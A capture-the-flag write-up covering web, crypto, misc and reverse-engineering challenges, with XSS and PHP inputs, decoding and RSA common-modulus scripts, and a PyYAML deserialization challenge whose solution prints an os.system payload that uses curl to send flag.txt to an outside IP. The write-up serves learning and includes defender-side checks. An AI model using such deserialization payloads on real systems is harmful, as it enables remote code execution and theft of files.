WEB
Easy XSS
payload:?name=dazhutizi"<script>alert('XSS')</script>
Result: flag{- .... . ..-. .. .-. ... - -..- ... ... ..-. .-.. .- --. }
Morse decoding gives: flag{THEFIRSTXSSFLAG}
Maybe Difficult XSS
payload:?keyword=dazhutizi"><A HREF="javascript:alert()">flag</a>
flag{W0w_iS_D1fficu1t_XSS's_F1ag}
Easy php
For this challenge, if you submit a number that really satisfies the check, the sleep() call would make you wait about two months. is_numeric() accepts ordinary numbers as well as hexadecimal strings starting with 0x, whereas an (int) cast of a hexadecimal/0x-prefixed string returns 0.
payload1:?TIME=6e6
payload2:?TIME=0x4f1a00
Future Chrome
Looking at the page
Clearly the User-Agent should be modified
This returns a base64-encoded string
Decoding gives flag{uauaua_hahaha}
F12
Open the page, see the hint, press F12 and look in the response headers
flag{hahahaha_headers}
Variable Overwrite
Press F12 to find the hint
Open the file 121212.txt
Audit the code
Parameters are passed in the URL via GET, and the data is packed as an array in $_GET. extract() imports variables from an array into the current symbol table, using the array keys as variable names and the array values as variable values. isset() checks whether the variable $shiyan exists; trim() removes whitespace (or other predefined characters) from both ends of a string, here spaces; file_get_contents() reads an entire file into a string. If the value of $shiyan equals the file content ($content), the flag is printed.
Solution
shiyan=&flag=
This yields the flag
Simple Verification
Inspect the JS in the F12 console; there is a link inside an alert(), and opening it gives a flag image
Pigpen cipher; decoding gives flag{free_mason}
Who si he
In the F12 console there is a comment that looks like base64
Convert the base64 into an image; given the question "who is he?", the flag is flag{zeyehongzhi}
Xia Feng's Diary
The password is ADAIR321321.
After logging in, the flag is flag{bugku-shegong_xmq}
Python
Challenge page contents:
1 Background
An article on the Gouchen Security Lab (勾陈安全实验室) website[1] discussed Pickle deserialization, whereas this challenge uses the deserialization in the pyyaml module. So what are serialization and deserialization?
1.1 yaml
YAML, like XML and JSON, is a markup language. Every language that supports the YAML format has its own implementation for parsing it; in Python that is the pyyaml module, i.e. a YAML library. Each language's YAML parser implements, to a greater or lesser degree, its own set of language-specific rules for turning YAML into objects.
1.2 Serialization
Serialization is the process of converting a data structure or object into binary (a byte sequence).
Write the following into wp.yaml:
date: !!str 2018-10-26
Then run the following code in the same directory:
import yaml
After running, the result is as follows:
As can be seen, the statements in the YAML file were serialized.
1.3 Deserialization
Deserialization, as the name suggests, is the reverse of serialization: converting the binary string produced during serialization back into a data structure or object.
2 Challenge Design
From article[2]:
To achieve code execution, the content being serialized and deserialized must contain objects of the programming language (Python functions or classes), because deserializing an object builds an instance of it (instantiation). If an object contains a function definition, i.e. executable code, then after instantiation that code can be reached through a method call or some other path. Deserializing ordinary data types only performs variable initialization and assignment and never touches a logic-bearing code block, so no code is executed! (ordinary data type = data; object = function code + data)
The function mainly responsible for the vulnerability is yaml.load(). So, following the idea from the write-up in [3], we built an upload feature: when a user uploads a file with a .yaml or .yml extension, the code calls yaml.load() on it to deserialize it.
The challenge environment was built with python2.7 + flask1.0.2 + PyYaml3.12.
The core code is as follows:
3 Solving the Challenge
After trying many kinds of files, some turn out to be accepted, e.g. jpg, png, txt. But once you know the challenge is about YAML deserialization, just upload a yaml file with the following payload:
"hello": !!python/object/apply:os.system ["curl http://47.106.105.37/?`cat flag.txt`"]
The command is executed during deserialization. The output of cat cannot be echoed directly to the page, so curl is used to send the flag to a server; the IP address given above can be changed, even to a local machine. The flag then appears in the access_log.
4 Reproduction Files
The files have been posted in the recruitment group~~
Run docker with the following command:
docker build -t ctf_web . # build the image; ctf_web is an arbitrary name
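As an added defender-side example (not code from the write-up or the challenge), a pre-parse check that an upload handler could run on a .yaml/.yml file before handing it to PyYAML: it flags the python/* tags that make yaml.load() instantiate arbitrary objects, in both the !!python/ shorthand and the expanded tag:yaml.org,2002:python/ form, and rejects %TAG directives that could alias that namespace. The real fix is yaml.safe_load(), which refuses these tags outright; the sample documents below are constructed.

```python
import re

# PyYAML-specific tags that construct arbitrary Python objects during load.
# The "!!python/" shorthand expands to "tag:yaml.org,2002:python/", and a
# document may also write the expanded form explicitly as !<tag:...>.
_PY_TAG = re.compile(r"(?:!!|tag:yaml\.org,2002:)python/[A-Za-z_/]+(?::[\w.]+)?")
# A %TAG directive can bind a custom handle (e.g. !py!) to that namespace.
_TAG_DIRECTIVE = re.compile(r"^%TAG\s", re.MULTILINE)


def find_python_tags(document: str) -> list:
    """Return every python/* tag present in the raw YAML text."""
    return _PY_TAG.findall(document)


def is_safe_to_load(document: str) -> bool:
    """Gate for uploaded .yaml/.yml files before any parsing happens.

    Rejects documents carrying python/* tags and, conservatively, any
    document that declares a %TAG handle, because the handle could name
    the python/ namespace in a form this text scan would not recognise.
    Defence in depth only: the loader itself must still be yaml.safe_load().
    """
    if _TAG_DIRECTIVE.search(document):
        return False
    return not find_python_tags(document)


# Constructed samples (not from the challenge): one benign document and
# three spellings of the object-construction tag the write-up's payload uses.
BENIGN = "date: !!str 2018-10-26\nname: hello\n"
SHORTHAND = '"hello": !!python/object/apply:os.system ["true"]\n'
EXPANDED = '"hello": !<tag:yaml.org,2002:python/object/apply:os.system> ["true"]\n'
ALIASED = '%TAG !py! tag:yaml.org,2002:python/\n---\nhello: !py!object/apply:os.system ["true"]\n'
```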
Crypto
One-time pad:
Attacking A Many Time Pad - Cryptography
https://github.com/Jwomers/many-time-pad-attack
import string
import collections
import sets, sys
c1='220900155b09223d3a270a5813260d1a07111a0e3257137a5d'
c2='08080415083b3f3b3b69030d131f0c00005005027f535d575d'
c3='15090547342135742b20031113020417545400042d4b434714'
c4='084c1204132a3d31736927545b17040110111a0f3e46135a09'
c5='0f1f4113132a703b31251754561c06010d411a0e305c135e18'
c6='0e0305470f2731207f201d545e13111b115c0f133651525f11'
c7='461c13080d2a3e742b264e1656520b1c00110d153e51585619'
c8='031a04155b2636742b210b5458171c531d424e0c3a4247130e'
c9='05191302576f1c312b69231113190b1c031107017f4b5c465d'
c10='011e04025b3839203769031113060a5301420b472b5a5a405d'
# c11='080f131e0b3b393b31691d175b170816545002103e4b401d0c'
ciphers = [c1, c2, c3, c4, c5, c6, c7, c8, c9, c10]
# The target ciphertext we want to crack
#target_cipher = "0529242a631234122d2b36697f13272c207f2021283a6b0c7908"
# XORs two strings
def strxor(a, b): # xor two strings (trims the longer input)
    return "".join([chr(ord(x) ^ ord(y)) for (x, y) in zip(a, b)])
def target_fix(target_cipher):
    # To store the final key
    final_key = [None]*150
    # To store the positions we know are broken
    known_key_positions = set()

    # For each ciphertext
    for current_index, ciphertext in enumerate(ciphers):
        counter = collections.Counter()
        # for each other ciphertext
        for index, ciphertext2 in enumerate(ciphers):
            if current_index != index: # don't xor a ciphertext with itself
                for indexOfChar, char in enumerate(strxor(ciphertext.decode('hex'), ciphertext2.decode('hex'))): # Xor the two ciphertexts
                    # If a character in the xored result is an alphabetic character, it means there was probably a space character in one of the plaintexts (we don't know which one)
                    if char in string.printable and char.isalpha():
                        counter[indexOfChar] += 1 # Increment the counter at this index
        knownSpaceIndexes = []
        # Loop through all positions where a space character was possible in the current_index cipher
        for ind, val in counter.items():
            # If a space was found at least 7 times at this index out of the 9 possible XORS, then the space character was likely from the current_index cipher!
            if val >= 7: knownSpaceIndexes.append(ind)
        #print knownSpaceIndexes # Shows all the positions where we now know the key!

        # Now Xor the current_index with spaces, and at the knownSpaceIndexes positions we get the key back!
        xor_with_spaces = strxor(ciphertext.decode('hex'),' '*150)
        for index in knownSpaceIndexes:
            # Store the key's value at the correct position
            final_key[index] = xor_with_spaces[index].encode('hex')
            # Record that we know the key at this position
            known_key_positions.add(index)

    # Construct a hex key from the currently known key, adding in '00' hex chars where we do not know (to make a complete hex string)
    final_key_hex = ''.join([val if val is not None else '00' for val in final_key])
    # Xor the currently known key with the target cipher
    output = strxor(target_cipher.decode('hex'),final_key_hex.decode('hex'))
    print "Fix this sentence:"
    print ''.join([char if index in known_key_positions else '*' for index, char in enumerate(output)])+"\n"

    # WAIT.. MANUAL STEP HERE
    # This output prints a * for every character that is not known yet
    # fix the missing characters like this: "Let*M**k*ow if *o{*a" = "cure, Let Me know if you a"
    # if it is too hard, change the target_cipher to another one and try again
    # and we have our key to fix the entire text!
    #sys.exit(0) #comment and continue if u got a good key
    target_plaintext = "cure, Let Me know if you a"
    print "Fixed:"
    print target_plaintext+"\n"
    key = strxor(target_cipher.decode('hex'),target_plaintext)
    print "Decrypted msg:"
    for cipher in ciphers:
        print strxor(cipher.decode('hex'),key)
    print "\nPrivate key recovered: "+key+"\n"

for i in ciphers:
    target_fix(i)
Base All-in-One
Straight to the script
import base64
s1 = "4C4A575851324332474E324547574B594A563546514D4B4747464D564F4E4C474B4E56454D32435947464A484D56444E4D5134513D3D3D3D"
s1 = base64.b16decode(s1)   # outermost layer: Base16 (hex)
s1 = base64.b32decode(s1)   # next layer: Base32
s1 = base64.b64decode(s1)   # innermost layer: Base64
print s1
Repeated Base64
import base64
a = open('base64.txt')
try:
    b = a.read()
finally:
    a.close()
while True:
    try:
        b = base64.b64decode(b)   # keep peeling Base64 layers
    except:
        print b                   # the first value that no longer decodes is the plaintext
        break
flag{base64_base64_base64}
Random Base
import base64
f = open("code.txt")
file = f.read()
n = ''
steps = []
while True:
    # try the three decoders in turn; the first one that does not raise is taken as this layer
    try:
        n = base64.b16decode(file)
        steps.append(16)
        file = n
        continue
    except:
        pass
    try:
        n = base64.b32decode(file)
        steps.append(32)
        file = n
        continue
    except:
        pass
    try:
        n = base64.b64decode(file)
        steps.append(64)
        file = n
        continue
    except:
        pass
    break
print steps   # the sequence of bases peeled, outermost first
print n       # the final decoded content
Scripts like this are worth keeping.
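The "Random Base" script above relies on the decoder raising an exception for the wrong base, but base64.b64decode() discards characters outside its alphabet instead of raising (Python 3 only complains with validate=True), so garbage can be accepted as a layer. Below is an added Python 3 version (not from the write-up) that checks each layer's alphabet strictly and only accepts a layer whose output is still printable text; the sample input is constructed by wrapping a flag in Base64, then Base32, then Base16.

```python
import base64
import binascii
import re
import string

# Strict alphabets. "try each decoder until one fails" is unreliable because
# b64decode() silently drops non-alphabet bytes, so the alphabet is checked first.
_ALPHABETS = {
    16: re.compile(rb"^[0-9A-Fa-f]+$"),
    32: re.compile(rb"^[A-Z2-7]+=*$"),
    64: re.compile(rb"^[A-Za-z0-9+/]+=*$"),
}


def _decode_layer(data: bytes, base: int) -> bytes:
    """Decode one layer, raising binascii.Error unless data is strictly valid."""
    if not _ALPHABETS[base].match(data):
        raise binascii.Error("not in the base%d alphabet" % base)
    if base == 16:
        return base64.b16decode(data, casefold=True)
    if base == 32:
        return base64.b32decode(data)
    return base64.b64decode(data, validate=True)


def peel(data: bytes, max_layers: int = 64):
    """Strip nested Base16/32/64 layers; returns (plaintext, bases peeled)."""
    steps = []
    for _ in range(max_layers):
        data = data.strip()
        for base in (16, 32, 64):       # narrowest alphabet first
            try:
                decoded = _decode_layer(data, base)
            except binascii.Error:
                continue
            # Accept the layer only if the result is still text; this keeps a
            # plaintext that happens to be valid Base64 from being decoded
            # once more into binary junk.
            if decoded and all(c in string.printable.encode() for c in decoded):
                steps.append(base)
                data = decoded
                break
        else:
            return data, steps          # no decoder accepted the data
    return data, steps


# Constructed sample: a flag wrapped Base64 -> Base32 -> Base16 (outermost last).
SAMPLE_PLAINTEXT = b"flag{constructed_sample}"
SAMPLE = base64.b16encode(base64.b32encode(base64.b64encode(SAMPLE_PLAINTEXT)))
```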
Easy RSA
A simple common-modulus attack; extract n and e with a Python script.
郁离歌's article: https://blog.csdn.net/like98k/article/details/79352076
from gmpy2 import invert

def egcd(a, b):
    # Extended Euclid: returns (g, x, y) with a*x + b*y = g = gcd(a, b)
    if a == 0:
        return (b, 0, 1)
    else:
        g, y, x = egcd(b % a, a)
        return (g, x - (b // a) * y, y)

# Challenge parameters: one modulus n shared by two public exponents
n = 17362520124149736059291605717839814089431261833972408175766504894876091272021197374480215582589878198406028065354454242540322618614670160317701698407729515781811530180885334265851364490357884909336085410775168953942120359215038925025305363480538685487988827339463890539279008285241711326041868183805848503077373967082910932422798165242481154593794712639251157856102009630894845049984346776659339380886766804814959778048440996937820138560802077375885700500737699904011032451007341777160586467318264288370080315519305800247682611802774996999330812534723806925426052547128371180683265963525581842037399869323246530085399
c1 = 11757177168629974661319129065020939259607843855964612407515015619551332717303594939284265148421101106538576564879770344246694669035164564635188309876801896156214909946098869029964618647606449218025915092461416329529723153695631060387903820322776063152970417682658882514448192870115306139048632667164375339647480060498038060662339943872320998391726896418231367745182167642401094985859083528539732718585607300300744481583877075988159078923393794888199752412273065186387778708588318818871255432956112609603017152148063465689319082652284861285738454428311471661017770501362483439955249552527930663707069794266908382237863
c2 = 2364848878397323871885597084235162950454738150033561990125608234733186785294327511676322556989693319543787881108157790541032502889824032246849038028277601291878651138223131738210948288040172974610279550123399373111991951111719314902078119305973622147396199257818150347936553495169543808071509800280778646769553776723985138633331947024508645378935223338224527962766707863670722941767067705851822587652625805245801727869961524972624327839027498877534264770109063202217409037083612774983213841234965045214820133529399280883524064963136158251681946077429913578531311243649928666453318570284124743168193304356485791847813
e1 = 2333
e2 = 23333

def main(n, c1, c2, e1, e2):
    s = egcd(e1, e2)
    s1 = s[1]
    s2 = s[2]
    # A negative coefficient becomes a positive exponent on the modular inverse of that ciphertext
    if s1 < 0:
        s1 = -s1
        c1 = invert(c1, n)
    elif s2 < 0:
        s2 = -s2
        c2 = invert(c2, n)
    m = int(pow(c1, s1, n) * pow(c2, s2, n) % n)
    # Python 2 appends 'L' to the hex of a long; strip it before hex-decoding
    print hex(m)[2:].replace('L', '').decode('hex')
    # print n2s(m)

if __name__ == '__main__':
    main(n, c1, c2, e1, e2)
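As an added example (not the write-up's script), the same common-modulus attack in Python 3 with a constructed toy key pair, so the algebra can be checked end to end: x*e1 + y*e2 = 1 gives c1^x * c2^y = m (mod n), and a negative coefficient is absorbed by inverting that ciphertext with pow(c, -1, n) (Python 3.8+). The primes, flag and exponents are constructed; the key-management lesson is the challenge's own: never issue two keys on one modulus.

```python
def egcd(a: int, b: int):
    """Extended Euclid: returns (g, x, y) with a*x + b*y = g = gcd(a, b)."""
    if a == 0:
        return b, 0, 1
    g, y, x = egcd(b % a, a)
    return g, x - (b // a) * y, y


def common_modulus(n: int, e1: int, c1: int, e2: int, c2: int) -> int:
    """Recover m from c1 = m^e1 and c2 = m^e2 (mod n) with coprime e1, e2.

    x*e1 + y*e2 = 1, so c1^x * c2^y = m^(x*e1 + y*e2) = m (mod n).
    A negative coefficient is handled by inverting that ciphertext, which
    exists whenever gcd(c, n) == 1, i.e. m shares no factor with n.
    """
    g, x, y = egcd(e1, e2)
    if g != 1:
        raise ValueError("e1 and e2 must be coprime")
    if x < 0:
        c1, x = pow(c1, -1, n), -x      # Python 3.8+ modular inverse
    if y < 0:
        c2, y = pow(c2, -1, n), -y
    return pow(c1, x, n) * pow(c2, y, n) % n


# Constructed toy parameters (Mersenne primes, far too small for real use):
# one modulus shared by two public exponents, the challenge's misconfiguration.
P, Q = 2**89 - 1, 2**107 - 1
N = P * Q
M = int.from_bytes(b"flag{toy}", "big")     # 72-bit m < P < Q, so gcd(M, N) == 1
E1, E2 = 2333, 23333
C1, C2 = pow(M, E1, N), pow(M, E2, N)


def recovered_flag() -> bytes:
    """Decrypt using only public data (N, E1, C1, E2, C2): no private key needed."""
    m = common_modulus(N, E1, C1, E2, C2)
    return m.to_bytes((m.bit_length() + 7) // 8, "big")
```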
MISC
Big Shark (Wireshark)
Start in the sky
emmmmm, not much to say: right-click, Properties, Details, and the flag is there.
Brute Force
Brute-force with Zipper, digits only. That gives the archive password, and the flag is inside.
pg8
Who was the password given to
Browsing through the packets reveals a user and a base64 string
Decoding gives an email address, which leads to the flag
Image with an embedded archive (图种)
Save the image to the desktop, change the extension to zip, and extract to get flag.txt
flag{C16CD2BCE86CF5824E6C2128E6B636CA}
Secret in the Music
Save the audio locally and open it in Audition (Au): it contains Morse code, decode it
crc32
Brute-force the crc32 values of the given archive with the tool crc32-master
Combining the matching results gives the archive password ctf_covteam_com_66
Extracting gives covteam.txt
Binary to Characters
This yields the base64 of an image; converting it to an image gives a QR code
Decoding gives flag{D41D8CD98F00B204E9800998ECF8427E}
Android
easy andriod
Download it onto a phone and enter an arbitrary flag: it shows "input cannot be empty" and "wrong" messages
Secret
There is a native function getPass()
The String being compared comes from this function, so reverse the .so file directly.
Open it in IDA
This challenge is only worth 50 points.
Pwn
Reverse
RE Basics
Drag it straight into IDA and press F5
Get the flag
The RE from the Recruitment Talk
Load it into IDA and find the key comparison function: it compares the input with the string "232+1".
so easy re
Solution 1:
After opening it in IDA you find the string {Hacking_for_fun}
The subsequent operations replace every i in the string with 1 and every r with 1.
So the final answer is {Hack1ng_fo1_fun}
Solution 2
Load it in OllyDbg, find the key jump, and set a breakpoint.
Then run it and enter an arbitrary string of the right length. The flag can be seen in the registers.
Easy Reverse
Decryption script
byte_8049AE0 = "lk2j9Gh}AgfY4ds-a6QW1#k5ER_T[cvLbV7nOm3ZeX{CMt8SZo]U"   # character table taken from the binary
byte_8049B15 = [0x48,0x5D,0x8D,0x24,0x84,0x27,0x99,0x9F,0x54,0x18,0x1E,0x69,0x7E,0x33,0x15,0x72,0x8D,0x33,0x24,0x63,0x21,0x54,0x0C,0x78,0x78,0x78,0x78,0x78,0x1B,0x00,0x00]   # encoded flag bytes taken from the binary
flag = ''
for v3 in range(29):
    # each encoded byte selects a table entry: index = byte/3 - 2 (integer division)
    flag += byte_8049AE0[byte_8049B15[v3] // 3 - 2]
print flag
Simple Function Encryption
First check for a packer with PEiD
After unpacking, find the key function
Write the decryption script
#include <stdio.h>
#include <string.h>

/* Scrambled flag as stored in the binary; the unused slots stay '\0',
   so printf stops after the 17 real characters. */
char cflag[20] = {'1','f','l','R','{','_','_','a','}','_','3','m','a','2','g','3','e'};

/* Swap cflag[a] and cflag[b] in place (XOR-swap idiom, as in the binary). */
void change(int a, int b)
{
    cflag[a] ^= cflag[b];
    cflag[b] ^= cflag[a];
    cflag[a] ^= cflag[b];
}

int main(void)
{
    /* Replay the swap sequence recovered from the key function. */
    change(10, 15);
    change(1, 15);
    change(2, 12);
    change(14, 10);
    change(16, 8);
    change(0, 1);
    change(6, 5);
    change(8, 11);
    change(3, 10);
    change(5, 12);
    change(1, 5);
    change(0, 15);
    printf("%s\n", cflag);
    return 0;
}
Life is hard, so be versatile.
by Covteam—Sma11-Tim3